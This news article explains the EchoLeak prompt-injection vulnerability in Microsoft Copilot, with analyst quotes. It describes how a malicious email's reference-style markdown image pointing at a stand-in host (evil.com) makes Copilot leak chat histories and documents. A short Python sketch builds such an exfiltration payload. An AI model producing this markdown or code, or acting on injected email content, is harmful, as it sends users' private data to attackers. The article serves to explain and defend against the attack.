“This is sheer weaponization of AI’s core strength, contextual understanding, against itself,” said Abhishek Anant Garg, an analyst at QKS Group. “Enterprise security struggles because it’s built for malicious code, not language that looks harmless but acts like a weapon.”
This kind of vulnerability represents a significant threat, warned Nader Henein, VP Analyst at Gartner. “Given the complexity of AI assistants and RAG-based services, it’s definitely not the last we’ll see.”
EchoLeak’s exploit mechanism
EchoLeak exploits Copilot’s ability to handle both trusted internal data (such as emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing reference-style markdown image syntax, such as “![Image alt text][ref]” with the reference defined as “[ref]: https://www.evil.com?param=”. When Copilot automatically scans the email in the background to prepare for user queries, rendering that image reference triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.
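To make the exfiltration step concrete, the sketch below shows how a reference-style markdown image can smuggle data through its URL query string. This is an illustration only: the domain, the “param” name, and the helper function are hypothetical, and the leaked string stands in for whatever sensitive context the assistant has in scope.

```python
from urllib.parse import quote, urlparse, parse_qs

def build_exfil_markdown(leaked_text: str) -> str:
    """Hypothetical helper: embed leaked_text into the URL of a
    reference-style markdown image. When a client renders the image,
    it issues a GET request to this URL, delivering the data to the
    attacker-controlled server (evil.com is a placeholder)."""
    url = "https://www.evil.com?param=" + quote(leaked_text)
    return f"![Image alt text][ref]\n\n[ref]: {url}"

payload = build_exfil_markdown("chat history: quarterly numbers")

# Recover the URL the rendering client would fetch automatically,
# and decode the query string the attacker's server would receive.
ref_url = payload.split("[ref]: ")[1]
received = parse_qs(urlparse(ref_url).query)["param"][0]
print(received)  # the "leaked" text arrives intact on the attacker's side
```

The point of the sketch is that no executable code ever reaches the victim: the payload is plain markdown, and the data leaves via an ordinary image fetch that security tooling tends to treat as benign.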